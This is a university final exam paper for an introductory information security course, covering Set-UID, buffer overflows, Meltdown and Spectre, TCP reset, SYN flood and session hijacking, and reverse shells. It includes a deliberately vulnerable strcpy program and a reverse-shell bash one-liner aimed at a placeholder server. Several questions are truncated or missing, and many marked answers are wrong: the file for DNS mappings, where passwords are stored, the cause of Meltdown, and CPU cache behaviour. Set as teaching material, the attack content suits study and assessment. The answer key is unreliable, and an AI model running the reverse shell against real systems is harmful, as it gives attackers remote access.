Introduction of Information Security: Test Paper
2021 to 2022 Academic Year, 2nd Semester, Final Exam
( ) Open-book or Closed-book

Name:            Grade & Class:            Score checker:

I. Do not answer on the left part of the Sealing Line.
II. TSA and ID cannot be altered.
III. Students shall write TSA, ID, Grade & Class in the corresponding blanks.
IV. If the paper is not clear, please ask the teacher for a new one.

Q No.         I    II   III  IV   V    VI   VII  VIII IX   X
Q Result      20   10   30   40
Your Result

Notice: If Student ID, TSA and Grade & Class are not filled in properly, the paper is invalid.

I. Single-choice questions (2 points for each question, 20 points in total)

1. The Set-UID privilege mechanism allows users to run a piece of a

2. In the Linux operating system, a process has access control rights as determined by the process's ( A ).
A. Real User ID (RUID)    B. Effective User ID (EUID)
C. Reserved user ID       D. Root user ID

D. When multiple processes or threads access shared resources at the same time

4. Meltdown and Spectre attacks are essentially a form of attack implemented using ( A ).
A. Buffer overflow vulnerability
B. Race condition vulnerability
C. Set-UID privilege mechanism vulnerability
D. Network protocol stack vulnerability

5. Meltdown and Spectre attacks take advantage of the ( A ) characteristics of the CPU when executing program instructions.
A. Out Of Order    B. Access permission check
C. Encoding        D. Decoding

6. In the Linux operating system, the correspondence of the DNS information is set in the ( C ) file.
A. /etc/hosts     B. /etc/local.d
C. /etc/passwd    D. /etc/shadow

7. In a buffer overflow attack (32-bit operating system), the following ( C ) option does not serve as a valid jump address for the attacker.
A. 0xbffff250    B. 0xbffff280    C. 0xbffff300    D. 0xbffff310
8. The program interface/library corresponding to the following ( A ) option cannot spoof network packets.
A. Socket    B. Raw socket    C. PCAP library    D. All of the above options

9. A 4-byte integer 0xAABBCCDD in a computer is stored at four locations in the memory area, at addresses 0x1000, 0x1001, 0x1002, 0x1003 (starting from 0x1000). If the computer has a big-endian byte order, the following wrong statement is ( D ).
A. The 0xAA is stored in 0x1000    B. The 0xBB is stored in 0x1001
C. The 0xCC is stored in 0x1002    D. The 0xDD is stored in 0x1000

10. For a TCP Reset attack, the information NOT required to collect is ( D ).
A. The source IP address/port      B. Target IP address/port
C. TCP packet sequence number      D. Application layer data

II. Judgment questions (1 point per question, a total of 10 points. Please mark √ after the correct description and mark × after the wrong description.)

11. Once the program obtains privileges through the Set-UID mechanism, the program has super user (root user) privileges. ( √ )

12. In the Linux operating system, the user's password is stored in the /etc/passwd file. ( √ )

14. When a piece of data is read multiple times from a memory address, the second read tends to be faster than the first, which is a phenomenon due to the properties of CPU cache. ( × )

16. An attacker can successfully implement a TCP SYN flooding attack with a fixed source IP address. ( × )

17. Buffer overflow vulnerabilities can be avoided by using strncpy(), strncat(). ( √ )

18. The Socket type of the network communication program based on TCP protocol is SOCK_STREAM. ( √ )

19. In the Linux operating system, the privileged shell instruction for the program TEST is: $ sudo chmod 4755 TEST. ( √ )

20. The monitoring and forgery of data packets in ANY network can be realized using network packet sniffing and spoofing techniques. ( × )

III. Short answer questions (6 points for each question, 30 points in total)

21. Please briefly describe the process and principles of DNS deception attacks in a local network environment (Local DNS attacks).

22. Please briefly describe the principle of TCP reset attack combined with the information in the figure below.

23. Please briefly describe the principle of TCP SYN flooding attack combined with the information in the figure below.

24. Describe the functions performed by these two statements:

    read(5, data, 100);
    write(3, data, 100);

25. The ASLR (Address Space Layout Randomization) mechanism can make the buffer overflow attack more difficult to launch; please explain the reason.

IV. Analysis questions (10 points for each question, 40 points in total)

26. Someone has written the C code below (named stack.c).

    #include <stdlib.h>
    #include <stdio.h>
    #include <string.h>

    /* The declaration lines of foo() are missing from the page; they are
       reconstructed from question (1): parameter str, buffer[0]..buffer[99]. */
    int foo(char *str)
    {
        char buffer[100];
        strcpy(buffer, str);
        return 1;
    }

    /* The declaration lines of main() are missing from the page; the size
       of str is taken from the fread() call below. */
    int main(int argc, char **argv)
    {
        char str[200];
        FILE *badfile;
        badfile = fopen("badfile", "r");
        fread(str, sizeof(char), 200, badfile);
        foo(str);
        printf("returned Properly\n");
        return 1;
    }

(1) The following figure shows the relative storage location map of the main() function and the foo() function in the memory stack space. Please specifically correlate the parameter str of the foo function (represented as str), the variable buffer[] in foo() (represented as buffer[0] to buffer[99]), the foo function return address (represented as Return address), and the previous frame pointer (represented as previous frame pointer) with the corresponding areas A, B, C, D of the foo() stack frame area in the figure, respectively.

(2) Does the stack.c code have a buffer overflow vulnerability? If so, explain the principle and process of the attack between the main() function and the foo() function in the memory stack (you can add pictures to clarify your point), and explain what measures can be taken to prevent this vulnerability according to what we have learned during the class.

27. As shown in the figure below, the legitimate user User (IP address: 10.0.2.68) is connecting to the server Server (IP address: 10.0.2.69) through telnet (a TCP-based connection), when the Attacker (IP address: 10.0.2.70) successfully launches a TCP Session Hijacking attack on this telnet connection. User then finds that after 8 characters have been input on the telnet terminal, he cannot enter any more information, and the telnet terminal crashes. A network packet sniffing tool (Wireshark, for example) shows that after the attack is successfully launched, any packets User sends to Server are discarded by Server, and any packets Server sends back to User are discarded by User as well.

(1) Please analyze and explain the cause of this phenomenon, that is, the principle of the TCP Session Hijacking attack;

(2) Why did the telnet program freeze and then crash after 8 characters were input on the telnet terminal? What impact will the successful attack have on the Server after this attack?

28. Assuming that machines A and B are in the same local network (10.3.2.0/24), A sends out forged packets onto the network and B is monitoring the packets in the local network. B observes the following information: B can sniff packets with destination IP address 1.2.3.4 from A, but B cannot sniff packets with destination IP address 10.3.2.30 from A. Please answer the following questions:

(1) For B, what are the conditions to successfully sniff the information of the local network?

(2) Please explain the cause of the above phenomenon.

29. With the help of the network, the attacker can obtain the shell or root

    /bin/bash -c "/bin/bash -i > /dev/tcp/server_ip/9090 0<&1 2>&1"

(1) Please explain the meaning of 0, 1, 2, >, <, & in the above statement;

(2) What does the attacker need to do on his machine in order to successfully get the shell information output on the server side? Please also explain the meaning represented by /dev/tcp/server_ip/9090;

(3) Combined with the above statement, explain the implementation process of the reverse shell attack;

(4) Combined with the relevant knowledge learned in our class, what attacking methods can be used to successfully transmit and execute the above reverse shell instruction on the server side?